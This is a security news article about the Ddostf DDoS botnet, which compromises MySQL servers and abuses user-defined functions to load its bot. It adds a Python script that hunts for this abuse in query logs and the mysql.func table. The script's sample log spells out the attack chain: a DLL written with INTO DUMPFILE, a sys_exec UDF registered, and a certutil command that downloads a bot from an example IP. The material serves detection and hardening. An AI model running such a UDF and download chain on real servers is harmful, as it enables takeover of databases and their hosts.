The 'Ddostf' malware botnet is actively targeting MySQL servers, hijacking them for a DDoS-as-a-Service platform that rents its firepower to other cybercriminals. According to cybersecurity researchers, the operators of Ddostf compromise their targets either by exploiting unpatched vulnerabilities in MySQL environments or by brute-forcing weak administrator credentials.
The Hackers Behind the Ddostf Botnet Exploit Legitimate Functions
Attackers scan the Internet for exposed MySQL servers and, once one is found, brute-force their way in. On Windows MySQL servers they then abuse a legitimate feature, user-defined functions (UDFs), to execute commands on the compromised host.
A UDF is a MySQL feature that lets users write functions in C or C++, compile them into a shared library (a DLL on Windows), and load that library into the database server to extend its capabilities. In this campaign the attackers ship their own library, named 'amd.dll', and register its malicious functions with the server. Those functions include:
- Downloading payloads such as the Ddostf DDoS bot from a remote server.
- Executing arbitrary system-level commands sent by the attackers.
- Capturing the results of command execution, storing them in a temporary file, and sending them back to the attackers.
Abusing UDFs this way is the mechanism for loading the attack's primary payload, the Ddostf bot client. Because UDF code runs inside the mysqld process with the privileges of the MySQL service account, the same foothold also allows installation of other malware, data exfiltration, backdoors for persistent access, and any other activity those privileges permit.
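How this UDF chain looks in a query log and how to hunt for it, as an added example that is not code from the page or from the Ddostf report: a Python script that scans a constructed MySQL general-query-log excerpt for the three steps (a library written with INTO DUMPFILE, CREATE FUNCTION ... SONAME, and a call to the newly registered function) and then audits mysql.func rows against an allowlist. The DLL path, the function name sys_exec, the IP addresses and the download URL are assumptions for illustration, not indicators from the report.

```python
"""Hunt for MySQL UDF abuse of the kind described above.

Added example, not code from the page or from the Ddostf report. The log
excerpt, file paths, the function name sys_exec, the IP addresses and the
download URL are all constructed for illustration.
"""
import re

# Constructed excerpt of a MySQL general query log (general_log=ON).
# Each line is: <time> <thread_id> <command> <argument>.
SAMPLE_GENERAL_LOG = """\
2023-11-15T10:02:11.412Z\t   12 Connect\troot@203.0.113.7 on  using TCP/IP
2023-11-15T10:02:11.419Z\t   12 Query\tSELECT @@plugin_dir
2023-11-15T10:02:12.003Z\t   12 Query\tSELECT 0x4D5A90000300000004000000FFFF0000 INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 5.7/lib/plugin/amd.dll'
2023-11-15T10:02:12.110Z\t   12 Query\tCREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'amd.dll'
2023-11-15T10:02:12.250Z\t   12 Query\tSELECT sys_exec('cmd.exe /c certutil -urlcache -split -f http://198.51.100.20/bot.exe C:/Windows/Temp/bot.exe')
2023-11-15T10:05:40.000Z\t   13 Query\tSELECT id, name FROM customers WHERE id = 42
"""

LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$")
# CREATE [AGGREGATE] FUNCTION name RETURNS {STRING|INTEGER|REAL|DECIMAL} SONAME 'lib'
CREATE_UDF = re.compile(
    r"CREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+(?P<name>\w+)\s+RETURNS\s+\w+\s+SONAME\s+'(?P<lib>[^']+)'",
    re.IGNORECASE,
)
# SELECT <bytes> INTO DUMPFILE 'path' is how a library is dropped into plugin_dir from SQL.
DUMPFILE = re.compile(r"INTO\s+DUMPFILE\s+'(?P<path>[^']+)'", re.IGNORECASE)
LIBRARY_SUFFIXES = (".dll", ".so")


def parse_general_log(text):
    """Yield one dict (ts, conn, cmd, arg) per parseable log line."""
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            yield m.groupdict()


def find_udf_abuse(text):
    """Return (thread_id, finding, detail) tuples for the UDF attack chain.

    Function names registered with SONAME are remembered so that later calls
    to them are flagged even though the call itself is an ordinary SELECT.
    """
    findings = []
    registered = set()
    for rec in parse_general_log(text):
        if rec["cmd"] != "Query":
            continue
        sql = rec["arg"]
        m = DUMPFILE.search(sql)
        if m and m.group("path").lower().endswith(LIBRARY_SUFFIXES):
            findings.append((rec["conn"], "library written via INTO DUMPFILE", m.group("path")))
        m = CREATE_UDF.search(sql)
        if m:
            registered.add(m.group("name").lower())
            findings.append((rec["conn"], "UDF registered", f"{m.group('name')} from {m.group('lib')}"))
            continue
        for name in registered:
            if re.search(rf"\b{re.escape(name)}\s*\(", sql, re.IGNORECASE):
                findings.append((rec["conn"], "UDF invoked", sql))
                break
    return findings


def audit_func_table(rows, approved_libraries):
    """Flag rows of `SELECT name, ret, dl, type FROM mysql.func` whose library
    is not on the allowlist. Works without any query log: mysql.func is the
    persistent record of every registered UDF."""
    return [row for row in rows if row[2] not in approved_libraries]


def remediation_sql(suspicious_rows):
    """Statements to unregister the flagged UDFs (the library file in
    plugin_dir still has to be removed on the host)."""
    return [f"DROP FUNCTION IF EXISTS `{name}`;" for name, _ret, _dl, _type in suspicious_rows]


if __name__ == "__main__":
    for conn, kind, detail in find_udf_abuse(SAMPLE_GENERAL_LOG):
        print(f"thread {conn}: {kind}: {detail}")
    # Constructed mysql.func rows: one legitimate UDF and the attacker's.
    rows = [("my_hash", 3, "libmyhash.so", "function"), ("sys_exec", 2, "amd.dll", "function")]
    bad = audit_func_table(rows, approved_libraries={"libmyhash.so"})
    print("\n".join(remediation_sql(bad)))
```

Two caveats for anyone running this for real. The general log is off by default and expensive, so in production the same patterns are better applied to the output of an audit plugin. More importantly, the first step of the chain only works from SQL when the server allows it: with secure_file_priv set to NULL (or to a directory other than plugin_dir) INTO DUMPFILE cannot drop a library where SONAME will find it, and keeping the FILE privilege and INSERT on the mysql system schema away from application accounts removes the rights CREATE FUNCTION ... SONAME needs. Registered UDFs persist in mysql.func across restarts, which is why the table audit is worth scheduling independently of log review.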
The Ddostf Botnet can Connect to New Command-and-Control (C2) Addresses
Ddostf originates from China and first appeared around seven years ago; it targets both Linux and Windows systems.
On Windows, the malware establishes persistence by registering itself as a system service on first execution. It then decrypts its command-and-control (C2) configuration and connects to the C2 server, after which it collects host information (CPU frequency, core count, language settings, Windows version, network speed, and more) and sends it to the server.
The C2 server can issue a range of commands to the bot: launch a DDoS attack (SYN flood, UDP flood, or HTTP GET/POST flood), stop reporting system status, switch to a new C2 address, or download and execute a new payload. The ability to be redirected to a new C2 address is what sets Ddostf apart from most DDoS botnet malware, since it lets the operators keep control of infected hosts even after the original C2 infrastructure is taken down.
In light of this campaign, MySQL administrators should apply the latest updates and enforce long, unique passwords on administrator accounts to resist brute-force and dictionary attacks. Since the intrusion starts with servers reachable from the Internet, the database port should not be exposed publicly at all where it can be avoided, and the privileges the UDF step depends on (the FILE privilege and write access to the mysql system schema) should be held only by accounts that genuinely need them.